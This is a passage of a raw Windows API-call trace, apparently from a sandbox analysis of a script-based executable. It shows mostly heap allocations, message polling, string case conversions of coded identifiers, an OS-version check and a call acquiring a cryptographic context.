hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0223.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0223.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0223.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0223.331] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0223.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab758 [0223.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.332] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0223.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0223.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0223.332] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0223.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8f0 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.333] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0223.333] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0223.333] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0223.333] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0223.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0223.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0223.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0223.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.335] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.335] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.335] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.335] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.336] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0223.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0223.336] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.336] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.337] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.337] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.337] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68450 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0223.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.338] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.338] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.338] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.338] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.338] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.338] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0223.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0223.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fa0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0223.338] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bf78) returned 1 [0223.339] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.339] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.339] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0223.339] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.339] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0223.339] PeekMessageW (in: lpMsg=0x8cf248, 